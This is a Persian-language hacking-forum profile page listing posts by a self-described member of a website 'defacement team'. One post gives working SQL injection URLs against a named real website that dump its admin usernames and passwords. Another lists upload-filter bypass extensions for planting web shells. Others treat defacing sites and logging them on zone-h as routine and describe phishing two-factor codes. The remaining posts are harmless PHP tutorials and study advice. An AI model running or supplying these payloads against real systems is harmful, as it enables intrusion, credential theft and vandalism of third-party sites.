discord icon
سرور دیسکورد گاردایران

MR.MSA

عضو تیم دیفیس
  • تعداد ارسال ها

    484
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    42

آخرین بار برد MR.MSA در 8 اردیبهشت

MR.MSA یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره MR.MSA

  • درجه

  • تاریخ تولد 15 بهمن 1248

روش های تماس

  • Website URL
    mr-msa.xyz
  • Yahoo
    mr.msa7@yahoo.com
  • Skype
    mr.msa

اطلاعات فردی

  • نام اصلی
    MSA
  • محل سکونت
    Guardiran Security Team
  • جنسیت
    آقا

اطلاعات کامپیوتر شخصی

  • سیستم عامل
    Mac
  • مرورگر
    Chrome
  • آنتی ویروس
    Avira

آخرین بازدید کنندگان نمایه

5,385 بازدید کننده نمایه
  1. با سلام خدمت تمامی دوستان عزیز گاردایران در این ویدیو با آسیب پذیری Execution After Redirect (EAR) آشنا شدیم و نحوه بهره برداری و استفاده از این باگ رو بصورت عملی کار کردیم به علاوه نحوه جلوگیری از این باگ. لینک ویدیو در یوتیوب: https://www.youtube.com/watch?v=YiW65po1jec
  2. درسته، گفتم شاید سوال بقیه هم باشه. این ویدیو رو نگاه کن زمانی که به ۴۰ تا افزایش پیدا میکنه بعد با ای پی هایی که داره تست میکنه اما اینجور که من دیدم تعداد سرور هاش نمیتونسته 1000000 کد رو پوشش بده برای همین مثلا ممکنه ۱۰ دقیقه اول جواب نده اما چند تا ده دقیقه تست کنه میشه و بستگی به شانستون داره. و با توجه به چیزی که گفته بود اگر تعداد ای پی هایی که داری رو خیلی زیاد کنی که همه کد ها رو پوشش بده قطعا همون ۱۰ دقیقه اول جواب میگیری. و این یه نمونست و نمونه های خیلی زیادی داریم.
  3. سلام اول اینکه یعنی چی نمیشه اینستا رو هک کرد ؟ "امنیت هیچ وقت صد در صد نیست" و اتفاقا یه امنیت کار باگی رو از اینستا گرفته بود فک کنم ۲۰،۰۰۰ دلار بانتی داده بودن که میشد هر اکانتی رو توی ۱۰ دقیقه زد با یه سری شرایط و... که تعداد دفعات برای تست کد فورگت پسورد رو افزایش میداد مثلا ۴۰ بار و با یه اسکریپت php کد های ۶ رقمی رو تست میکرد با سرور هایی که داشت و یه همچین چیزی. رایت تاپش هم منتشر شد ... و اکسپلویت های 0day و کلی چیز دیگه قرار بر این نیست هر روش و متدی هست پابلیک باشه و.. در ضمن میشه همون تایید دو مرحله ای رو هم به فیشینگ اضافه کرد باز با همون مهندسی اجتماعی هم میشه هم پسورد رو گرفت و هم کد دو مرحله ای! @C0d3!Nj3ct!0n لطفا تاپیک رو قفل کنید. موفق باشید.
  4. سلام عضو "تیم دیفیس"  یعنی چی؟؟؟؟

    1. نمایش دیدگاه قبلی  بیشتر 1
    2. MR.MSA

      MR.MSA

      با سلام 

      بعد از دسترسی به یک سایت 

      هکر میتونه کارای مختلفی رو انجام بده 

      یکی از این کارا دیفیس هست یعنی یک صفحه html رو توی سایت اپلود کنه یا صفحه index و مثلا بنویسه هک شده توسط تیم امنیتی گاردایران 

      این کار میتونه دلایل مختلفی داشته باشه....

       

      موفق باشید.

    3. HACKER-12302

      HACKER-12302

      آها حالا فهمیدم پس سایت های هک شده توسط گارد ایران دراصل معنی دیفیس شده رو میدن

      ممنون

    4. MR.MSA

      MR.MSA

      درسته.

      خواهش میکنم.

      موفق و پیروز باشید.

  5. خب نکته همینجاست احتمال داره کسی به سیستمتون دسترسی نداشته باشه و سیستم ویروسی شده باشه.
  6. ویدئو شماره چهل و سوم تارگت: ise.ac Tables: http://www.ise.ac/index.php?ID=-1%27+union+select+11111111,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--+ Columns: http://www.ise.ac/index.php?ID=-1%27+union+select+11111111,group_concat(column_name)+from+information_schema.columns+where+table_name=%27admin%27--+ Informations: http://www.ise.ac/index.php?ID=-1%27+union+select+11111111,group_concat(username,0x3a,password)+from+admin--+ In source , line 1345
  7. از کجا میدونید شخصی دسترسی به سیستمتون داره؟ چه نشونه هایی میشه در این رابطه توضیح بدید.
  8. سلام اول گفته باشم که از یک شل اختصاصی استفاده کنید چون فایروال شل هایی مثل الفا رو میشناسه. بایپس های مختلفی وجود داره که یک سری رو اینجا قرار میدم: .php5 .php7 .PhP .php;.png .php%00.png و همچنین میتونید header رو تغییر بدید با ابزار برپ سویت و از اون طریق هم تست کنید. اگر سرچ کنید بایپس های rfu توی یوتیوب ویدئو زیاده. موفق باشید.
  9. سلام دوست عزیز انجمن گارد ایران به هیچ وجه پروژه قبول نمیکنه و این کار شما خلاف قوانین هست در ضمن اینکار میتونه زیان اور باشه برای خیلی ها و کار درستی نیست! (bitcoin) لطفا قبل از فعالیت قوانین رو مطالعه کنید.
  10. MR.MSA

    آموزش تابع file_get_contents در php

    با سلام خدمت دوستان عزیز تابع file_get_contents در php یک از توابع مدیریت فایل ها در این زبان است . این تابع تمام اطلاعات داخل فایل یا url داده شده را به عنوان یک رشته می خواند . خواندن فایل: $data = file_get_contents('file.txt'); echo $data; در اینجا محتویات فایل file.txt به صورت رشته در متغیر data ذخیره میشود. خواندن فایل از ادرس: $data = file_get_contents('http://guardiran.org/file.txt'); echo $data; در این کد محتوایت این ادرس که به صورت txt هست در متغیر data ذخیره و در خط دوم نمایش داده میشود. موفق و پیروز باشید.
  11. با سلام دوست عزیز پیشنهاد من اینه که یک زمینه رو انتخاب کنید و وقت اصلی رو روی اون بزارید و بعد برید سراغ یک زمینه دیگه خیلی از کسانی که وارد دنیای امنیت میشن به همه زمینه های مختلف هکینگ علاقه دارن اما بهتره که اول یک زمینه رو تخصصی کار کنید و اینکه در تست و نفوذ برنامه نویسی یکی از مهم ترین چیزایی هست که شما باید بلد باشید و چه خوب که شما هم به برنامه نویسی خیلی علاقه دارید اما نکته قابل توجه برای اینکه چه زبان برنامه نویسی رو انتخاب کنید بر میگرده به زمینه ای که بهش علاقه دارید و بهتره یکم در این باره تحقیق کنید البته پیشنهاد من برای وب php هستش. و برای یادگیری میتونید از مطالب سایت های معتبر مثل owasp استفاده کنید که واقعا عالی هستند یا از ویدئو های یوتیوب آموزشی و همچنین از کتاب و دوره های رایگان اگر هم میتونید هزینه کنید دوره های مختلف توی سایت های ایرانی به زبان فارسی هست هم برای برنامه نویسی و هم برای تست و نفوذ که میتونید خریداری کنید. با تشکر. منابع انگلیسی : owasp.org exploit-db.com youtube.com medium.com
  12. MR.MSA

    Nmap Online

    با سلام خدمت دوستان عزیز توی این تاپیک میخوام یک سایت رو معرفی کنم که به صورت آنلاین nmap رو در اختیار دارید و میتونید اسکن کنید. (هر چند شاید نتونه جای خود nmap رو بگیره) آدرس : https://nmap.online/ و همچنین میتونید از اسکنر shodan استفاده کنید که توی موارد مختلف کاربرد داره : shodan.io و این سایت رو هم جدید بررسی کردم سرعت خیلی خوبه داری و یک رنج ip میدید و اسکن میکنه : http://ports.my-addr.com/ip-range-port-scanner-tool.php موفق و پیروز باشید.
  13. با سلام خدمت دوستان عزیز در این ویدئو نحوه پیدا کردن یک سری از نتایجی که افزونه wappalyzer به ما میده رو گفتیم و امیدوارم از این ویدئو لذت ببرید. در ضمن توجه داشته باشید که ویدئو تقریبا یک هفته پیش یا بیشتر گرفته شده ممکنه وقتی با افزونه wappalyzer نتایج رو نگاه میکنید متفاوت باشه مثل cloud flare که جدید اد شده توسط مدیریت. لینک ویدئو: https://www.aparat.com/v/Cz0e6
  14. MR.MSA

    تابع ساده ساخت لاگ با php

    با سلام خدمت دوستان در این ویدئو یک تابع ساده رو با php نوشتم جهت ساخت لاگ و بررسی بازدید کنندگان یک صفحه که در ویدئو های بعد این رو ارتقا میدیم. لینک ویدئو در آپارات: https://www.aparat.com/v/QdMLR کد ها: <?php function add_log($dir){ $dir = 'logs'; $filename = $dir.'/'.$_SERVER['REMOTE_ADDR'].'.php'; if(!is_file($filename)){ $fh = fopen($filename,'a'); fwrite($fh,"<?php die(); ?>\n"); fclose($fh); } $log = "Date: ".date('Y/m/d h:i:s')." User Agent: ".$_SERVER['HTTP_USER_AGENT']." URL: ".$_SERVER['REQUEST_URI']."\n"; $fh = fopen($filename,'a'); fwrite($fh,$log); fclose($fh); } add_log('logs'); موفق و پیروز باشید.
  15. با سلام نمیشه گفت وقتی یک باگ رو پیدا میکنید اکسپلویتش کنید و سوال شما یکم مشکل داره فرض میکنیم سایت guardiran.org رو اسکن کردی و باگ rfu رو گرفتی الان شما میتونی مثلا سایت رو دیفیس کنی و توی zone-h.org ثبت کنی! اما نمیتونی توی exploit-db.com ثبتش کنی و توی cxsecurity هم احتمالش کمه ثبت بشه حالا چه زمانی میتونید اکسپلویت کنید ؟ مثلا فرض کن از یک افزونه وردپرس به اسم contact form 7 باگ گرفتی حالا هر سایتی که اون افزونه رو داره این باگ رو هم داره و میتونی توی exploit-db.com و cxsecurity.com ثبتش کنی یا مثلا از یک cms باگ گرفتی که باگت جوری هست که بشه توی سایت های دیگه هم ازش استفاده کرد ولی وقتی از گاردایران یه باگ رو میگیری اینکه بتونی جاهای دیگه پیداش کنی شرایط خاص خودشو داره و خیلی وقتا نمیشه مگر اینکه مثلا گاردایران از IPS هست و تو از IPS باگ بگیری که اون موقع میتونی اکسپلویت کنی البته اکسپلویت نوع های دیگه هم داره فقط صرفا این نیست که بگی همه سایت های IPS مثلا sqli داره فرض کن یک باگ پرایوت هست و مراحل خاص خودشو داره یا یه برنامه اختصاصی براش نوشتی و.. که بیشتر اکسپلویت ها با php,ruby,perl,python هست سایت هایی که برای اکسپلویت میتونید استفاده کنید: exploit-db.com exploit-db.ga cxsecurity.com 0day.today securityfocus.com packetstormsecurity.com exploit-author.com and.... موفق و پیروز باشید.